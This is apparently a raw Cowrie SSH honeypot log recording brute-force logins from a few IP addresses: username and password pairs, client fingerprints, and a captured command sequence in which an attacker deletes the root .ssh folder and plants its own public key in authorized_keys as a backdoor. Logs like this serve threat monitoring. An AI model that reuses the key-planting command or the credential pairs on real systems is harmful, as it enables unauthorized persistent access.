{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:27:20.439055Z","src_ip":"212.227.235.229","session":"8c6629ecfa8b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:27:20.732176Z","src_ip":"212.227.235.229","session":"8c6629ecfa8b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:27:21.941396Z","src_ip":"212.227.235.229","session":"8c6629ecfa8b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:27:22.237464Z","src_ip":"212.227.235.229","session":"8c6629ecfa8b"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:27:22.240830Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37370,"dst_ip":"1.2.3.4","dst_port":22,"session":"50355c59f242","protocol":"ssh","message":"New connection: 212.227.235.229:37370 (1.2.3.4:22) [session: 50355c59f242]","sensor":"my-vps","timestamp":"2025-09-08T22:27:39.545900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:27:39.547196Z","src_ip":"212.227.235.229","session":"50355c59f242"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:27:39.860087Z","src_ip":"212.227.235.229","session":"50355c59f242"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"111","message":"login attempt [samsung/111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:27:41.150685Z","src_ip":"212.227.235.229","session":"50355c59f242"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:27:42.466765Z","src_ip":"212.227.235.229","session":"50355c59f242"}
{"eventid":"cowrie.login.success","username":"root","password":"blackout","message":"login attempt [root/blackout] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:28:16.524877Z","src_ip":"212.227.125.160","session":"c3bc79fe4acd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:28:16.541294Z","src_ip":"212.227.125.160","session":"c3bc79fe4acd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44192,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e9c367ad894","protocol":"ssh","message":"New connection: 212.227.235.229:44192 (1.2.3.4:22) [session: 6e9c367ad894]","sensor":"my-vps","timestamp":"2025-09-08T22:28:21.463795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:28:21.464455Z","src_ip":"212.227.235.229","session":"6e9c367ad894"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:28:21.802478Z","src_ip":"212.227.235.229","session":"6e9c367ad894"}
{"eventid":"cowrie.login.failed","username":"aisino","password":"12345","message":"login attempt [aisino/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:28:23.181414Z","src_ip":"212.227.235.229","session":"6e9c367ad894"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:28:24.517808Z","src_ip":"212.227.235.229","session":"6e9c367ad894"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50734,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dcf35ed8b68","protocol":"ssh","message":"New connection: 212.227.235.229:50734 (1.2.3.4:22) [session: 3dcf35ed8b68]","sensor":"my-vps","timestamp":"2025-09-08T22:28:33.996682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:28:33.997650Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:28:34.319502Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty12!","message":"login attempt [root/Qwerty12!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:28:35.753952Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:28:36.464931Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:28:36.465621Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:28:36.466859Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:28:36.789055Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:28:37.536375Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:28:37.537407Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:28:37.861419Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:28:37.862391Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50742,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae0e610b5c6c","protocol":"ssh","message":"New connection: 212.227.235.229:50742 (1.2.3.4:22) [session: ae0e610b5c6c]","sensor":"my-vps","timestamp":"2025-09-08T22:28:38.130045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:28:38.130805Z","src_ip":"212.227.235.229","session":"ae0e610b5c6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:28:38.424322Z","src_ip":"212.227.235.229","session":"ae0e610b5c6c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:28:39.635325Z","src_ip":"212.227.235.229","session":"ae0e610b5c6c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:28:40.927989Z","src_ip":"212.227.235.229","session":"ae0e610b5c6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33372,"dst_ip":"1.2.3.4","dst_port":22,"session":"9104d7d79b99","protocol":"ssh","message":"New connection: 212.227.235.229:33372 (1.2.3.4:22) [session: 9104d7d79b99]","sensor":"my-vps","timestamp":"2025-09-08T22:28:41.224453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:28:41.225498Z","src_ip":"212.227.235.229","session":"9104d7d79b99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:28:41.518636Z","src_ip":"212.227.235.229","session":"9104d7d79b99"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:28:42.734401Z","src_ip":"212.227.235.229","session":"9104d7d79b99"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:28:43.028893Z","src_ip":"212.227.235.229","session":"9104d7d79b99"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:28:43.049319Z","src_ip":"212.227.235.229","session":"3dcf35ed8b68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52684,"dst_ip":"1.2.3.4","dst_port":22,"session":"72b2bdfa533e","protocol":"ssh","message":"New connection: 212.227.235.229:52684 (1.2.3.4:22) [session: 72b2bdfa533e]","sensor":"my-vps","timestamp":"2025-09-08T22:28:56.959753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:28:56.960798Z","src_ip":"212.227.235.229","session":"72b2bdfa533e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:28:57.274297Z","src_ip":"212.227.235.229","session":"72b2bdfa533e"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"qwerty","message":"login attempt [usertest/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T22:28:58.564456Z","src_ip":"212.227.235.229","session":"72b2bdfa533e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:28:59.879008Z","src_ip":"212.227.235.229","session":"72b2bdfa533e"}
{"eventid":"cowrie.session.connect","src_ip":"147.185.132.55","src_port":60968,"dst_ip":"1.2.3.4","dst_port":22,"session":"d451e8c3b4a6","protocol":"ssh","message":"New connection: 147.185.132.55:60968 (1.2.3.4:22) [session: d451e8c3b4a6]","sensor":"my-vps","timestamp":"2025-09-08T22:29:25.405397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-08T22:29:26.231453Z","src_ip":"147.185.132.55","session":"d451e8c3b4a6"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-08T22:29:27.311580Z","src_ip":"147.185.132.55","session":"d451e8c3b4a6"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:29:33.750941Z","src_ip":"147.185.132.55","session":"d451e8c3b4a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39638,"dst_ip":"1.2.3.4","dst_port":22,"session":"335edafd3f61","protocol":"ssh","message":"New connection: 212.227.235.229:39638 (1.2.3.4:22) [session: 335edafd3f61]","sensor":"my-vps","timestamp":"2025-09-08T22:29:41.307195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:29:41.308128Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
